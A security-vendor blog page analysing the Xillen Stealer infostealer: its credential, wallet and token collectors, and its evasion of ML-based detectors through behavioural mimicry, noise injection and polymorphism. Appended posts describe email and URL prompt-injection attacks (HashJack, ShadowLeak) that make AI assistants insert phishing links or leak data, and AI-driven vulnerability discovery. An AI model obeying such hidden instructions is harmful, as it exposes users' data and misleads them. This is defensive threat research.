Blog
/
Network
/
November 20, 2025

Xillen Stealer Updates to Version 5 to Evade AI Detection

Xillen Stealer v4/v5 introduces advanced features to evade AI detection, steal credentials, cryptocurrency, and sensitive data across browsers, password managers, and cloud environments. With polymorphic engines, container persistence, and behavioral mimicking, this Python-based malware highlights evolving threats and future AI integration in cybercrime campaigns.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Tara Gould
Malware Research Lead
xillen stealer updates to version 5 to evade ai detectionDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog image
20
Nov 2025

Introduction

Python-based information stealer “Xillen Stealer” has recently released versions 4 and 5, expanding its targeting and functionality. The cross-platform infostealer, originally reported by Cyfirma in September 2025, targets sensitive data including credentials, cryptocurrency wallets, system information, browser data and employs anti-analysis techniques.  

The update to v4/v5 includes significantly more functionality, including:

  • Persistence
  • Ability to steal credentials from password managers, social media accounts, browser data (history, cookies and passwords) from over 100 browsers, cryptocurrency from over 70 wallets
  • Kubernetes configs and secrets
  • Docker scanning
  • Encryption
  • Polymorphism
  • System hooks
  • Peer-to-Peer (P2P) Command-and-Control (C2)
  • Single Sign-On (SSO) collector
  • Time-Based One-Time Passwords (TOTP) and biometric collection
  • EDR bypass
  • AI evasion
  • Interceptor for Two-Factor Authentication (2FA)
  • IoT scanning
  • Data exfiltration via Cloud APIs

Xillen Stealer is marketed on Telegram, with different licenses available for purchase. Users who deploy the malware have access to a professional-looking GUI that enables them to view exfiltrated data, logs, infections, configurations and subscription information.

Screenshot of the Xillen Stealer portal.
Figure 1: Screenshot of the Xillen Stealer portal.

Technical analysis

The following technical analysis examines some of the interesting functions of Xillen Stealer v4 and v5. The main functionality of Xillen Stealer is to steal cryptocurrency, credentials, system information, and account information from a range of stores.

Xillen Stealer specifically targets the following wallets and browsers:

AITargetDectection

Screenshot of Xillen Stealer’s AI Target detection function.
Figure 2: Screenshot of Xillen Stealer’s AI Target detection function.

The ‘AITargetDetection’ class is intended to use AI to detect high-value targets based on weighted indicators and relevant keywords defined in a dictionary. These indicators include “high value targets”, like cryptocurrency wallets, banking data, premium accounts, developer accounts, and business emails. Location indicators include high-value countries such as the United States, United Kingdom, Germany and Japan, along with cryptocurrency-friendly countries and financial hubs. Wealth indicators such as keywords like CEO, trader, investor and VIP have also been defined in a dictionary but are not in use at this time, pointing towards the group’s intent to develop further in the future.

While the class is named ‘AITargetDetection’ and includes placeholder functions for initializing and training a machine learning model, there is no actual implementation of machine learning. Instead, the system relies entirely on rule-based pattern matching for detection and scoring. Even though AI is not actually implemented in this code, it shows how malware developers could use AI in future malicious campaigns.

Screenshot of dead code function.
Figure 3: Screenshot of dead code function.

AI Evasion

Screenshot of AI evasion function to create entropy variance.
Figure 4: Screenshot of AI evasion function to create entropy variance.

‘AIEvasionEngine’ is a module designed to help malware evade AI-based or behavior-based detection systems, such as EDRs and sandboxes. It mimics legitimate user and system behavior, injects statistical noise, randomizes execution patterns, and camouflages resource usage. Its goal is to make the malware appear benign to machine learning detectors. The techniques used to achieve this are:

  • Behavioral Mimicking: Simulates user actions (mouse movement, fake browser use, file/network activity)
  • Noise Injection: Performs random memory, CPU, file, and network operations to confuse behavioral classifiers
  • Timing Randomization: Introduces irregular delays and sleep patterns to avoid timing-based anomaly detection
  • Resource Camouflage: Adjusts CPU and memory usage to imitate normal apps (such as browsers, text editors)
  • API Call Obfuscation: Random system API calls and pattern changes to hide malicious intent
  • Memory Access Obfuscation: Alters access patterns and entropy to bypass ML models monitoring memory behavior

PolymorphicEngine

As part of the “Rust Engine” available in Xillen Stealer is the Polymorphic Engine. The ‘PolymorphicEngine’ struct implements a basic polymorphic transformation system designed for obfuscation and detection evasion. It uses predefined instruction substitutions, control-flow pattern replacements, and dead code injection to produce varied output. The mutate_code() method scans input bytes and replaces recognized instruction patterns with randomized alternatives, then applies control flow obfuscation and inserts non-functional code to increase variability. Additional features include string encryption via XOR and a stub-based packer.

Collectors

DevToolsCollector

Figure 5: Screenshot of Kubernetes data function.

The ‘DevToolsCollector’ is designed to collect sensitive data related to a wide range of developer tools and environments. This includes:

IDE configurations

  • VS Code, VS Code Insiders, Visual Studio
  • JetBrains: Intellij, PyCharm, WebStorm
  • Sublime
  • Atom
  • Notepad++
  • Eclipse

Cloud credentials and configurations

  • AWS
  • GCP
  • Azure
  • Digital Ocean
  • Heroku

SSH keys

Docker & Kubernetes configurations

Git credentials

Database connection information

  • HeidiSQL
  • Navicat
  • DBeaver
  • MySQL Workbench
  • pgAdmin

API keys from .env files

FTP configs

  • FileZilla
  • WinSCP
  • Core FTP

VPN configurations

  • OpenVPN
  • WireGuard
  • NordVPN
  • ExpressVPN
  • CyberGhost

Container persistence

Screenshot of Kubernetes inject function.
Figure 6: Screenshot of Kubernetes inject function.

Biometric Collector

Screenshot of the ‘BiometricCollector’ function.
Figure 7: Screenshot of the ‘BiometricCollector’ function.

The ‘BiometricCollector’ attempts to collect biometric information from Windows systems by scanning the C:\Windows\System32\WinBioDatabase directory, which stores Windows Hello and other biometric configuration data. If accessible, it reads the contents of each file, encodes them in Base64, preparing them for later exfiltration. While the data here is typically encrypted by Windows, its collection indicates an attempt to extract sensitive biometric data.

Password Managers

The ‘PasswordManagerCollector’ function attempts to steal credentials stored in password managers including, OnePass, LastPass, BitWarden, Dashlane, NordPass and KeePass. However, this function is limited to Windows systems only.

SSOCollector

The ‘SSOCollector’ class is designed to collect authentication tokens related to SSO systems. It targets three main sources: Azure Active Directory tokens stored under TokenBroker\Cache, Kerberos tickets obtained through the klist command, and Google Cloud authentication data in user configuration folders. For each source, it checks known directories or commands, reads partial file contents, and stores the results as in a dictionary. Once again, this function is limited to Windows systems.

TOTP Collector

The ‘TOTP Collector’ class attempts to collect TOTPs from:

  • Authy Desktop by locating and reading from Authy.db SQLite databases
  • Microsoft Authenticator by scanning known application data paths for stored binary files
  • TOTP-related Chrome extensions by searching LevelDB files for identifiable keywords like “gauth” or “authenticator”.

Each method attempts to locate relevant files, parse or partially read their contents, and store them in a dictionary under labels like authy, microsoft_auth, or chrome_extension. However, as before, this is limited to Windows, and there is no handling for encrypted tokens.

Enterprise Collector

The ‘EnterpriseCollector’ class is used to extract credentials related to an enterprise Windows system. It targets configuration and credential data from:

  • VPN clients
    • Cisco AnyConnect, OpenVPN, Forticlient, Pulse Secure
  • RDP credentials
  • Corporate certificates
  • Active Directory tokens
  • Kerberos tickets cache

The files and directories are located based on standard environment variables with their contents read in binary mode and then encoded in Base64.

Super Extended Application Collector

The ‘SuperExtendedApplication’ Collector class is designed to scan an environment for 160 different applications on a Windows system. It iterates through the paths of a wide range of software categories including messaging apps, cryptocurrency wallets, password managers, development tools, enterprise tools, gaming clients, and security products. The list includes but is not limited to Teams, Slack, Mattermost, Zoom, Google Meet, MS Office, Defender, Norton, McAfee, Steam, Twitch, VMWare, to name a few.

Bypass

AppBoundBypass

This code outlines a framework for bypassing App Bound protections, Google Chrome' s cookie encryption. The ‘AppBoundBypass’ class attempts several evasion techniques, including memory injection, dynamic-link library (DLL) hijacking, process hollowing, atom bombing, and process doppelgänging to impersonate or hijack browser processes. As of the time of writing, the code contains multiple placeholders, indicating that the code is still in development.

Steganography

The ‘SteganographyModule’ uses steganography (hiding data within an image) to hide the stolen data, staging it for exfiltration. Multiple methods are implemented, including:

  • Image steganography: LSB-based hiding
  • NTFS Alternate Data Streams
  • Windows Registry Keys
  • Slack space: Writing into unallocated disk cluster space
  • Polyglot files: Appending archive data to images
  • Image metadata: Embedding data in EXIF tags
  • Whitespace encoding: Hiding binary in trailing spaces of text files

Exfiltration

CloudProxy

Screenshot of the ‘CloudProxy’ class.
Figure 8: Screenshot of the ‘CloudProxy’ class.

The CloudProxy class is designed for exfiltrating data by routing it through cloud service domains. It encodes the input data using Base64, attaches a timestamp and SHA-256 signature, and attempts to send this payload as a JSON object via HTTP POST requests to cloud URLs including AWS, GCP, and Azure, allowing the traffic to blend in. As of the time of writing, these public facing URLs do not accept POST requests, indicating that they are placeholders meant to be replaced with attacker-controlled cloud endpoints in a finalized build.

P2PEngine

Screenshot of the P2PEngine.
Figure 9: Screenshot of the P2PEngine.

The ‘P2PEngine’ provides multiple methods of C2, including embedding instructions within blockchain transactions (such as Bitcoin OP_RETURN, Ethereum smart contracts), exfiltrating data via anonymizing networks like Tor and I2P, and storing payloads on IPFS (a distributed file system). It also supports domain generation algorithms (DGA) to create dynamic .onion addresses for evading detection.

After a compromise, the stealer creates both HTML and TXT reports containing the stolen data. It then sends these reports to the attacker’s designated Telegram account.

Xillen Killers

 Xillen Killers.
FIgure 10: Xillen Killers.

Xillen Stealer appears to be developed by a self-described 15-year-old “pentest specialist” “Beng/jaminButton” who creates TikTok videos showing basic exploits and open-source intelligence (OSINT) techniques. The group distributing the information stealer, known as “Xillen Killers”, claims to have 3,000 members. Additionally, the group claims to have been involved in:

  • Analysis of Project DDoSia, a tool reportedly used by the NoName057(16) group, revealing that rather functioning as a distributed denial-of-service (DDos) tool, it is actually a remote access trojan (RAT) and stealer, along with the identification of involved individuals.
  • Compromise of doxbin.net in October 2025.
  • Discovery of vulnerabilities on a Russian mods site and a Ukrainian news site

The group, which claims to be part of the Russian IT scene, use Telegram for logging, marketing, and support.

Conclusion

While some components of XillenStealer remain underdeveloped, the range of intended feature set, which includes credential harvesting, cryptocurrency theft, container targeting, and anti-analysis techniques, suggests that once fully developed it could become a sophisticated stealer. The intention to use AI to help improve targeting in malware campaigns, even though not yet implemented, indicates how threat actors are likely to incorporate AI into future campaigns.  

Credit to Tara Gould (Threat Research Lead)
Edited by Ryan Traill (Analyst Content Lead)

Appendicies

Indicators of Compromise (IoCs)

395350d9cfbf32cef74357fd9cb66134 - confid.py

F3ce485b669e7c18b66d09418e979468 - stealer_v5_ultimate.py

3133fe7dc7b690264ee4f0fb6d867946 - xillen_v5.exe

https://github[.]com/BengaminButton/XillenStealer

https://github[.]com/BengaminButton/XillenStealer/commit/9d9f105df4a6b20613e3a7c55379dcbf4d1ef465

MITRE ATT&CK

ID Technique

T1059.006 - Python

T1555 - Credentials from Password Stores

T1555.003 - Credentials from Password Stores: Credentials from Web Browsers

T1555.005 - Credentials from Password Stores: Password Managers

T1649 - Steal or Forge Authentication Certificates

T1558 - Steal or Forge Kerberos Tickets

T1539 - Steal Web Session Cookie

T1552.001 - Unsecured Credentials: Credentials In Files

T1552.004 - Unsecured Credentials: Private Keys

T1552.005 - Unsecured Credentials: Cloud Instance Metadata API

T1217 - Browser Information Discovery

T1622 - Debugger Evasion

T1082 - System Information Discovery

T1497.001 - Virtualization/Sandbox Evasion: System Checks

T1115 - Clipboard Data

T1001.002 - Data Obfuscation: Steganography

T1567 - Exfiltration Over Web Service

T1657 - Financial Theft

Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Tara Gould
Malware Research Lead

More in this series

No items found.

Blog

/

Email

/

May 1, 2026

How email-delivered prompt injection attacks can target enterprise AI – and why it matters

Default blog imageDefault blog image

What are email-delivered prompt injection attacks?

As organizations rapidly adopt AI assistants to improve productivity, a new class of cyber risk is emerging alongside them: email-delivered AI prompt injection. Unlike traditional attacks that target software vulnerabilities or rely on social engineering, this is the act of embedding malicious or manipulative instructions into content that an AI system will process as part of its normal workflow. Because modern AI tools are designed to ingest and reason over large volumes of data, including emails, documents, and chat histories, they can unintentionally treat hidden attacker-controlled text as legitimate input.  

At Darktrace, our analysis has shown an increase of 90% in the number of customer deployments showing signals associated with potential prompt injection attempts since we began monitoring for this type of activity in late 2025. While it is not always possible to definitively attribute each instance, internal scoring systems designed to identify characteristics consistent with prompt injection have recorded a growing number of high-confidence matches. The upward trend suggests that attackers are actively experimenting with these techniques.

Recent examples of prompt injection attacks

Two early examples of this evolving threat are HashJack and ShadowLeak, which illustrate prompt injection in practice.

HashJack is a novel prompt injection technique discovered in November 2025 that exploits AI-powered web browsers and agentic AI browser assistants. By hiding malicious instructions within the URL fragment (after the # symbol) of a legitimate, trusted website, attackers can trick AI web assistants into performing malicious actions – potentially inserting phishing links, fake contact details, or misleading guidance directly into what appears to be a trusted AI-generated output.

ShadowLeak is a prompt injection method to exfiltrate PII identified in September 2025. This was a flaw in ChatGPT (now patched by OpenAI) which worked via an agent connected to email. If attackers sent the target an email containing a hidden prompt, the agent was tricked into leaking sensitive information to the attacker with no user action or visible UI.

What’s the risk of email-delivered prompt injection attacks?

Enterprise AI assistants often have complete visibility across emails, documents, and internal platforms. This means an attacker does not need to compromise credentials or move laterally through an environment. If successful, they can influence the AI to retrieve relevant information seamlessly, without the labor of compromise and privilege escalation.

The first risk is data exfiltration. In a prompt injection scenario, malicious instructions may be embedded within an ordinary email. As in the ShadowLeak attack, when AI processes that content as part of a legitimate task, it may interpret the hidden text as an instruction. This could result in the AI disclosing sensitive data, summarizing confidential communications, or exposing internal context that would otherwise require significant effort to obtain.

The second risk is agentic workflow poisoning. As AI systems take on more active roles, prompt injection can influence how they behave over time. An attacker could embed instructions that persist across interactions, such as causing the AI to include malicious links in responses or redirect users to untrusted resources. In this way, the attacker inserts themselves into the workflow, effectively acting as a man-in-the-middle within the AI system.

Why can’t other solutions catch email-delivered prompt injection attacks?

AI prompt injection challenges many of the assumptions that traditional email security is built on. It does not fit the usual patterns of phishing, where the goal is to trick a user into clicking a link or opening an attachment.  

Most security solutions are designed to detect signals associated with user engagement: suspicious links, unusual attachments, or social engineering cues. Prompt injection avoids these indicators entirely, meaning there are fewer obvious red flags.

In this case, the intention is actually the opposite of user solicitation. The objective is simply for the email to be delivered and remain in the inbox, appearing benign and unremarkable. The malicious element is not something the recipient is expected to engage with, or even notice.

Detection is further complicated by the nature of the prompts themselves. Unlike known malware signatures or consistent phishing patterns, injected prompts can vary widely in structure and wording. This makes simple pattern-matching approaches, such as regex, unreliable. A broad rule set risks generating large numbers of false positives, while a narrow one is unlikely to capture the diversity of possible injections.

How does Darktrace catch these types of attacks?

The Darktrace approach to email security more generally is to look beyond individual indicators and assess context, which also applies here.  

For example, our prompt density score identifies clusters of prompt-like language within an email rather than just single occurrences. Instead of treating the presence of a phrase as a blocking signal, the focus is on whether there is an unusual concentration of these patterns in a way that suggests injection. Additional weighting can be applied where there are signs of obfuscation. For example, text that is hidden from the user – such as white font or font size zero – but still readable by AI systems can indicate an attempt to conceal malicious prompts.

This is combined with broader behavioral signals. The same communication context used to detect other threats remains relevant, such as whether the content is unusual for the recipient or deviates from normal patterns.

Ask your email provider about email-delivered AI prompt injection

Prompt injection targets not just employees, but the AI systems they rely on, so security approaches need to account for both.

Though there are clear indications of emerging activity, it remains to be seen how popular prompt injection will be with attackers going forward. Still, considering the potential impact of this attack type, it’s worth checking if this risk has been considered by your email security provider.

Questions to ask your email security provider

  • What safeguards are in place to prevent emails from influencing AI‑driven workflows over time?
  • How do you assess email content that’s benign for a human reader, but may carry hidden instructions intended for AI systems?
  • If an email contains no links, no attachments, and no social engineering cues, what signals would your platform use to identify malicious intent?

Visit the Darktrace / EMAIL product hub to discover how we detect and respond to advanced communication threats.  

Learn more about securing AI in your enterprise.

Continue reading
About the author
Kiri Addison
Senior Director of Product

Blog

/

AI

/

April 30, 2026

Mythos vs Ethos: Defending in an Era of AI‑Accelerated Vulnerability Discovery

mythos vulnerability discoveryDefault blog imageDefault blog image

Anthropic’s Mythos and what it means for security teams

Recent attention on systems such as Anthropic Mythos highlights a notable problem for defenders. Namely that disclosure’s role in coordinating defensive action is eroding.

As AI systems gain stronger reasoning and coding capability, their usefulness in analyzing complex software environments and identifying weaknesses naturally increases. What has changed is not attacker motivation, but the conditions under which defenders learn about and organize around risk. Vulnerability discovery and exploitation increasingly unfold in ways that turn disclosure into a retrospective signal rather than a reliable starting point for defense.

Faster discovery was inevitable and is already visible

The acceleration of vulnerability discovery was already observable across the ecosystem. Publicly disclosed vulnerabilities (CVEs) have grown at double-digit rates for the past two years, including a 32% increase in 2024 according to NIST, driven in part by AI even prior to Anthropic’s Mythos model. Most notably XBOW topped the HackerOne US bug bounty leaderboard, marking the first time an autonomous penetration tester had done so.  

The technical frontier for AI capabilities has been described elsewhere as jagged, and the implication is that Mythos is exceptional but not unique in this capability. While Mythos appears to make significant progress in complex vulnerability analysis, many other models are already able to find and exploit weaknesses to varying degrees.  

What matters here is not which model performs best, but the fact that vulnerability discovery is no longer a scarce or tightly bounded capability.

The consequence of this shift is not simply earlier discovery. It is a change in the defender-attacker race condition. Disclosure once acted as a rough synchronization point. While attackers sometimes had earlier knowledge, disclosure generally marked the moment when risk became visible and defensive action could be broadly coordinated. Increasingly, that coordination will no longer exist. Exploitation may be underway well before a CVE is published, if it is published at all.

Why patch velocity alone is not the answer

The instinctive response to this shift is to focus on patching faster, but treating patch velocity as the primary solution misunderstands the problem. Most organizations are already constrained in how quickly they can remediate vulnerabilities. Asset sprawl, operational risk, testing requirements, uptime commitments, and unclear ownership all limit response speed, even when vulnerabilities are well understood.

If discovery and exploitation now routinely precede disclosure, then patching cannot be the first line of defense. It becomes one necessary control applied within a timeline that has already shifted. This does not imply that organizations should patch less. It means that patching cannot serve as the organizing principle for defense.

Defense needs a more stable anchor

If disclosure no longer defines when defense begins, then defense needs a reference point that does not depend on knowing the vulnerability in advance.  

Every digital environment has a behavioral character. Systems authenticate, communicate, execute processes, and access resources in relatively consistent ways over time. These patterns are not static rules or signatures. They are learned behaviors that reflect how an organization operates.

When exploitation occurs, even via previously unknown vulnerabilities, those behavioral patterns change.

Attackers may use novel techniques, but they still need to gain access, create processes, move laterally, and will ultimately interact with systems in ways that diverge from what is expected. That deviation is observable regardless of whether the underlying weakness has been formally named.

In an environment where disclosure can no longer be relied on for timing or coordination, behavioral understanding is no longer an optional enhancement; it becomes the only consistently available defensive signal.

Detecting risk before disclosure

Darktrace’s threat research has consistently shown that malicious activity often becomes visible before public disclosure.

In multiple cases, including exploitation of Ivanti, SAP NetWeaver, and Trimble Cityworks, Darktrace detected anomalous behavior days or weeks ahead of CVE publication. These detections did not rely on signatures, threat intelligence feeds, or awareness of the vulnerability itself. They emerged because systems began behaving in ways that did not align with their established patterns.

This reflects a defensive approach grounded in ‘Ethos’, in contrast to the unbounded exploration represented by ‘Mythos’. Here, Mythos describes continuous vulnerability discovery at speed and scale. Ethos reflects an understanding of what is normal and expected within a specific environment, grounded in observed behavior.

Revisiting assume breach

These conditions reinforce a principle long embedded in Zero Trust thinking: assume breach.

If exploitation can occur before disclosure, patching vulnerabilities can no longer act as the organizing principle for defense. Instead, effective defense must focus on monitoring for misuse and constraining attacker activity once access is achieved. Behavioral monitoring allows organizations to identify early‑stage compromise and respond while uncertainty remains, rather than waiting for formal verification.

AI plays a critical role here, not by predicting every exploit, but by continuously learning what normal looks like within a specific environment and identifying meaningful deviation at machine speed. Identifying that deviation enables defenders to respond by constraining activity back towards normal patterns of behavior.

Not an arms race, but an asymmetry

AI is often framed as fueling an arms race between attackers and defenders. In practice, the more important dynamic is asymmetry.

Attackers operate broadly, scanning many environments for opportunities. Defenders operate deeply within their own systems, and it’s this business context which is so significant. Behavioral understanding gives defenders a durable advantage. Attackers may automate discovery, but they cannot easily reproduce what belonging looks like inside a particular organization.

A changed defensive model

AI‑accelerated vulnerability discovery does not mean defenders have lost. It does mean that disclosure‑driven, patch‑centric models no longer provide a sufficient foundation for resilience.

As vulnerability volumes grow and exploitation timelines compress, effective defense increasingly depends on continuous behavioral understanding, detection that does not rely on prior disclosure, and rapid containment to limit impact. In this model, CVEs confirm risk rather than define when defense begins.

The industry has already seen this approach work in practice. As AI continues to reshape both offense and defense, behavioral detection will move from being complementary to being essential.

Continue reading
About the author
Andrew Hollister
Principal Solutions Engineer, Cyber Technician
Your data. Our AI.
Elevate your network security with Darktrace AI